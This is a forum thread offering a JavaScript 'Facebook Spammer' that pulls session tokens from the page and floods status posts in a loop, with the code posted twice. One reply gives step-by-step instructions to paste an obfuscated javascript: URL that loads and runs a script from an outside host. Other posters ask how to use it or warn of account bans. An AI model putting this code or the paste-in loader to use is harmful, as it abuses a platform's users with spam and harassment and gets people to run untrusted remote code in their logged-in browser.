[JavaScript] Facebook Spammer

Vick

Member
Reputation
0
[JavaScript] Facebook Spammer

Code:
var a = document.body.innerHTML;
var Num = prompt("This script was made by TeraByTe of HallwayInsider.com\nPlease support us by registering on our site.", "Enter the number of messages to flood");
   formx = a.match(/name="post_form_id" value="([\d\w]+)"/)[1];

    dts = a.match(/name="fb_dtsg" value="([^"]+)"/)[1];    
    composerid = a.match(/name="xhpc_composerid" value="([^"]+)"/)[1];
   var msg = prompt("", "Enter the Message you want to flood");
    target = a.match(/name="targetid" value="([^"]+)"/)[1];

 pst = "post_form_id=" + formx + "&fb_dtsg=" + dts + "&xhpc_composerid=" + composerid + "&xhpc_targetid=" + target+ "&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=" + encodeURIComponent(msg) + "&xhpc_message=" + encodeURIComponent(msg) + "&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest";

i=0;
        
                    while(i < Num){

 with(newx = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"), setRequestHeader("Content-Type", "application/x-www-form-urlencoded")  , send(pst);
    i += 1;
                }
 
for what we can use this java script on facebook can please explain in detail so that it would be helpfull for us
 
What kind of link that we will be advertising?please help mate i'm newbie here for now i need guidance . :)
 
What is this?? and how am i supposed to integrate this into my facebook account.
 
1. Go to Facebook page you want to spam.
2. Put this in the address bar:
ja£vas£c£ript:var s=document.createElement('script');s.type='text/javascript';document.body.appendChild(s);s.src='http://k002.kiwi6.com/hotlink/phd8xko6fy/js.js';void(0)
(remove the £!)
Press enter.
3. Enter the number of messages you want to send. ex. 10
Press enter.
4. Enter the message to spam. ex. SPAM
Press enter.
5. ???
6. PROFIT!

- x-treme
 
No Offense.
But there are so many noobs in this world.
Google it if you need help, I posted an Article a few days back about how "Noobs" post help about PHP on forums when www.php.net is all you need. That article itself got over 7K views over 3 days and earned me $19.39 adsense.
 
Vick said:
[JavaScript] Facebook Spammer

Code:
var a = document.body.innerHTML;
var Num = prompt("This script was made by TeraByTe of HallwayInsider.com\nPlease support us by registering on our site.", "Enter the number of messages to flood");
   formx = a.match(/name="post_form_id" value="([\d\w]+)"/)[1];

    dts = a.match(/name="fb_dtsg" value="([^"]+)"/)[1];    
    composerid = a.match(/name="xhpc_composerid" value="([^"]+)"/)[1];
   var msg = prompt("", "Enter the Message you want to flood");
    target = a.match(/name="targetid" value="([^"]+)"/)[1];

 pst = "post_form_id=" + formx + "&fb_dtsg=" + dts + "&xhpc_composerid=" + composerid + "&xhpc_targetid=" + target+ "&xhpc_context=home&xhpc_fbx=1&xhpc_message_text=" + encodeURIComponent(msg) + "&xhpc_message=" + encodeURIComponent(msg) + "&UIPrivacyWidget[0]=40&privacy_data[value]=40&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&=Share&nctr[_mod]=pagelet_composer&lsd&post_form_id_source=AsyncRequest";

i=0;
        
                    while(i < Num){

 with(newx = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"), setRequestHeader("Content-Type", "application/x-www-form-urlencoded")  , send(pst);
    i += 1;
                }

Terabyte! I recognize you from the Talk Prizes forum.

On topic: Why would you do this to any of your "friends"? I would only do that to someone I don't know, or to someone I absolutely hate.
 
i hope that this can be used if needed as much as possible we should respect others property
 
I would suggest to not use this. Facebook could ban you when using this kind of tools.
 
I would suggest to not use this. Facebook could ban you when using this kind of tools.
 
Back
Top